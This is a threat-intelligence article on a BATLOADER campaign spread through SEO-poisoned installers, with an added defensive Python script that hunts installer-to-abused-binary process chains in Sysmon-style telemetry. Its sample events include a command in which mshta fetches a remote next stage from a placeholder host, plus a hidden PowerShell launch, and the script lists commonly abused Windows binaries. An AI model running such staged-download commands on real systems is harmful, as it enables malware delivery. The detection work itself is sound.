A new campaign has been discovered using search engine optimization (SEO) poisoning to trick users into downloading BATLOADER malware. The SEO keyword themes used as part of the poisoning include terms like “free productivity apps installation” or “free software development tools.”
The malware hosted on these poisoned search result sites is an installer that bundles legitimate software, such as Visual Studio or Zoom, with the BATLOADER payload. When the installer is executed, BATLOADER starts an infection chain that uses commonly abused Windows binaries to download and execute further payloads. Final payloads observed in this campaign include Cobalt Strike beacons, Ursnif, SplashTop and ATERA, which are used to establish remote access and persistence, with further post-exploitation frameworks following. In some cases ATERA was the first payload deployed, skipping most of the infection chain and installing the remote access tool directly.
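The chain described above, a trojanized installer launching commonly abused Windows binaries, is something a defender can hunt for in process-creation telemetry. The following is an added example written for this page, not code from the original report or from any vendor: it walks Sysmon-style process events (ProcessGuid/ParentProcessGuid) and flags any commonly abused binary whose ancestry leads back to an installer run from a user's Downloads folder. The list of abused binaries, the "setup"/"install" file-name heuristic and the sample events are all assumptions made for illustration; the article names neither the binaries nor the installer file names.

```python
"""Hunt for installer -> abused-binary process chains in Sysmon-style events.

Added example; not from the original article. The binary list, the
installer heuristic and the sample events below are assumptions.
"""

# Assumed set of commonly abused Windows binaries (the article names none).
# msiexec.exe is deliberately left out: legitimate installers spawn it routinely.
ABUSED_BINARIES = {
    "mshta.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe",
    "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe",
}


def image_name(image: str) -> str:
    """Return the lower-cased file name of a full image path."""
    return image.rsplit("\\", 1)[-1].lower()


def looks_like_downloaded_installer(image: str) -> bool:
    """Heuristic (assumption): an installer fetched from a search result lives
    in the user's Downloads folder and has 'setup' or 'install' in its name."""
    low = image.lower()
    return "\\downloads\\" in low and ("setup" in low or "install" in low)


def find_suspicious_chains(events):
    """Return (installer_image, child_image, command_line) for every abused
    binary whose ancestry, followed via ParentProcessGuid, reaches a downloaded
    installer. Walking the whole ancestry (rather than only the direct parent)
    still catches the chain when an intermediate stage such as cmd.exe sits
    between the installer and the abused binary."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    hits = []
    for e in events:
        if image_name(e["Image"]) not in ABUSED_BINARIES:
            continue
        seen = set()  # guards against malformed, cyclic parent links
        parent = by_guid.get(e["ParentProcessGuid"])
        while parent is not None and parent["ProcessGuid"] not in seen:
            seen.add(parent["ProcessGuid"])
            if looks_like_downloaded_installer(parent["Image"]):
                hits.append((parent["Image"], e["Image"], e["CommandLine"]))
                break
            parent = by_guid.get(parent["ParentProcessGuid"])
    return hits


# Constructed sample telemetry, not real events. GUIDs shortened for readability.
SAMPLE_EVENTS = [
    {"ProcessGuid": "A", "ParentProcessGuid": "0",
     "Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"},
    # Trojanized installer run from Downloads
    {"ProcessGuid": "B", "ParentProcessGuid": "A",
     "Image": "C:\\Users\\alice\\Downloads\\ZoomInstaller_setup.exe",
     "CommandLine": "ZoomInstaller_setup.exe"},
    # Malicious: installer spawns mshta.exe to fetch the next stage
    {"ProcessGuid": "C", "ParentProcessGuid": "B",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/stage2.hta"},
    # Benign: the bundled legitimate application starting
    {"ProcessGuid": "D", "ParentProcessGuid": "B",
     "Image": "C:\\Users\\alice\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe",
     "CommandLine": "Zoom.exe"},
    # Benign: an admin opening PowerShell from Explorer, no installer ancestor
    {"ProcessGuid": "E", "ParentProcessGuid": "A",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe"},
    # Malicious, nested: installer -> cmd.exe -> powershell.exe
    {"ProcessGuid": "F", "ParentProcessGuid": "B",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c run.bat"},
    {"ProcessGuid": "G", "ParentProcessGuid": "F",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop"},
]


if __name__ == "__main__":
    for installer, child, cmdline in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"{installer} -> {child}: {cmdline}")
```

On the constructed events the rule reports two chains (the mshta.exe child and the powershell.exe reached through cmd.exe) and stays silent on the bundled legitimate application and on the PowerShell session with no installer ancestor. In production, tune the binary list and the installer heuristic to your environment, and expect some noise from legitimate installers that genuinely use these binaries.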
This style of attack overlaps with techniques used by the Conti ransomware gang, as disclosed in the documentation leaked by a Conti affiliate last year. However, because that material is now public, it is likely that an unaffiliated actor is replicating Conti's techniques for its own purposes.